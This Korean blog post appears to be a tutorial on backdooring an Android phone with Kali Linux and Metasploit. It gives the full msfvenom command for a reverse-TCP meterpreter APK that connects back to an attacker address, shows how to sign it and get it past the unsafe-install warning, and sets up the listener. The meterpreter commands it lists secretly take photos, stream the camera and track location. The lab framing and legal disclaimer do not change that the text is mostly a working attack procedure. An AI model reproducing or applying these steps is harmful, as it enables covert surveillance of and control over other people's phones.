본문 바로가기

리눅스/모의 해킹

스마트폰 해킹 android 모의해킹

336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

오늘은 kail linux를 이용한 스마트폰 해킹을 해보도록 하겠습니다.

kail linux에 기본적으로 내장되어 있는 MATASPLOIT msfconsole 을 이용하고, msfvenom  으로

 

안드로이드 어플리케이션인 apk 파일로 만들어 설치하면 , kail 를 이용하여 스마트폰을 컨트롤 하는

부분입니다.

 

* 아래 내용은 타인 및 실제 서버에 적용하면 법적 책임을 지게 됩니다. 본 포스팅은 기초 단계의 해킹으로, 실제 서버 공격시 바로 적발되게 됩니다 *

 

우선 이번 실험환경은 다음과 같습니다.

 

 

 

 1. 유무선 공유기

2. 안드로이드 스마트폰

3. kail linux

 

 

 

1. 유무선 공유기를 통한 하나의 네트워크를 구성해 줍니다.

 

2. 안드로이드 스마트폰은 192.168.0.0 의 IP 를 할당해 주고, Kail linux 는 192.168.46.16 의 ip를 할당해

   줍니다.

 

 

 

 

첫 단계로 안드로이드 에서 작동할 악성코드 어플을 만들어 주어야 합니다.

 

root 로 로그인을 하시고, 원하시는 곳에 apk 파일을 만들어 줍니다.

 

저는 /Desktop/arcmir 폴더에 arcword.apk 라는 파일을 만들어 주었습니다.

 

명령어는 다음과 같습니다.

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.46.16 LPORT=4444 R > /root/Desktop/arcmir/arcword.apk

 

android 플랫폼에 서 -p payload 하여 동작하며, reverse_tcp 방식으로 연결됩니다.

LHOST 는 공격자 IP를 적어주시고, 사용할 포트를 정해주시면 됩니다.

 

이렇게 작성하시면 arcword.apk 라는 apk파일이 생성됩니다.

 

 

 

apk파일은 만들어 졌지만, 바로 설치는 불가능 합니다.

apk sign 이라는 작업을 해주어야 하는데요,

 

SignApk.zip

 

이 signapk.zip를 다운받으셔서 kail에 넣어줍니다.

 

같은 arcmir 폴더에 넣고 압축을 풀어주는데요.

 

마우스 우클릭 하여 압축해제 하지 마시고 명령어 unzip 으로 압축해제 하시기 바랍니다.

 

 

 

명령어 : unzip SignApk.zip

특정 폴더에 압축을 풀어주시려면, unzip SignApk.zip ./Desktop/arcmir

 

 

정상적으로 압축이 풀렸다면

arcmir폴더에 다음과 같은 파일들이 생기게 됩니다.

 

apk는 만들어 준거고, pem, pk8 등등 낯익은 확장자 명이 보이시지요?

 

apk 파일을 사인하는 명령어는 다음과 같습니다.

 

java -jar signapk.jar certificate.pem key.pk8 arcworld.apk arcworld2.apk

 

java -jar signapk.jar certificate.pem key.pk8 여기까지 모두 한줄로 작성하시고,

 

java -jar signapk.jar certificate.pem key.pk8 arcworld.apk 우리가 만든 apk 파일입니다.

 

java -jar signapk.jar certificate.pem key.pk8 arcworld.apk arcworld2.apk 사인하여 완성될 apk 파일

 이름입니다

 

에러가 나서 확인해보니. 사인 전에 만든 apk파일이 arcword.apk 로 오타가 났었네요 ^^;

오타 없이 잘 입력하시면 커멘드가 들어가고, arcworld2.apk 파일이 생성됩니다. 

 

 

arcworld2.apk 파일이 생성되었는데, 이것이 우리가 사용할 파일입니다.

 

네이버 메일이나 드롭박스 등을 이용해서 이 파일을 전송하시고, 우리의 희생양 스마트폰에서 다운

 

받습니다.

 

 

 

file-3.apk 로 다운받고, 바로 눌러 설치해 줍니다.

 

 

어플리케이션 설치 를 눌러 설치합니다.

 

 

정상적인 마켓 경로의 apk 파일이 아니라 설치가 차단됩니다.

더 보기를 눌러 계속설치 (안전하지 않음) 을 눌러줍니다. 

 

 

이렇게 설치가 완료되고, 하나의 좀비 스마트폰이 탄생하게 되었습니다.

 

다시 kail로 돌아가서 msfconsole 를 작동합니다.

 

 

명령어 : msfconsole

 

콘솔에 들어와서 핸들러 설정을 해줍니다.

 

 

 

감염된 좀비 스마트폰들을 조종할수 있도록 설정합니다.

 

명령어

 1. use exploit/multi/handler

 2. set payload android/meterpreter/reverse_tcp

 3. set LHOST 192.168.46.16

 4. set LPORT 4444

 5. set exitonsession false

 

아까 apk 파일 만드실때 입력한 설정값과 동일하게 작성하시면 됩니다.

 

여기까지 설정을 마치셨다면

 

exploit -j 로 공격을 시작합니다.

 

 

백도어가 시작되고 있습니다.

 

아직은 좀비 스마트폰이 활성화 되지 않아 아무 제어가 되지 않는데요,

 

백도어 어플을 설치한 스마트폰 잠금화면을 해제해 봅니다.

 

처음 하신다면, 스마트폰 잠금화면만 해제 하셔도 바로 kail로 세션이 연결이 되고, 만약 세션 연결이 안된다면 스마트폰 어플중 MainActivity 를 실행시켜 주세요 ( 한번 더블클릭 하면 됩니다)

 

그리고 sessions 를 입력하면 연결된 세션을 확인할수 있습니다.

 

 

 

저는 세션이 10번으로 입력되어 있어 10번에 연결하였습니다.

 

meterpreter 로 바뀌게 되면 연결되어 스마트폰에 대한 제어가 가능해집니다.

 

help 를 보시면 다양한 명령어 옵션이 나타나게 됩니다.

 

먼저 , sysinfo 라고 쳐보시면 해당 스마트폰에 대한 정보를 가지고 오게 됩니다.

 

meterpreter>sysinfo

 

Android 5.0버전을 사용하고 있는 것을 확인할수 있습니다.

 

webcam_list 를 보시면 스마트폰 카메라를 제어할수 있습니다.

 

1. Back Camera

2. Front Camera 로 나오는데요.

 

전면 카메라 사진을 찍어보도록 하겠습니다.

 

meterpreter>webcam_snap -i 2

 

스마트폰에서 찰칵 소리가 들리고 

kail 화면에 촬영된 사진이 전송됩니다. 

 

 

 

 

help 로 명령어를 보시면

통화목록과 sms목록, sms발송 등도 제어할수 있습니다.

( 저는 테블릿 pc에 설치하여 해당 부분이 안되었습니다.)

 

 

webcam_stream 메뉴는 실시간 영상을 전송하는군요.. ㄷㄷ

 

실시간 스마트폰의 위치추적도 가능합니다.

 

다소 아쉬운점이라면, 카메라 촬영시 소리가 나는 스마트폰과, 나지 않는 폰이 있습니다.

 

이렇게 손쉽게 위험에 노출되는 모습을 보며 두렵지 않으신가요?

 

절대 인가되지 않는 어플 설치는 주의가 필요합니다.

 

이제 기본적인 ap 제작 및 설치는 해보았는데요

 

요즘 탈옥 이나 루팅 이라는 안드로이드 및 아이폰 운영체제 에 대한 조작을 많이 하고 있습니다.

 

다음 시간에는 안드로이드 펌웨어 커널 속에 이 좀비 어플을 미리 내장시켜 탑재하여 작동시켜보도록 하겠습니다.

 

즐거운 저녁 되세요 !!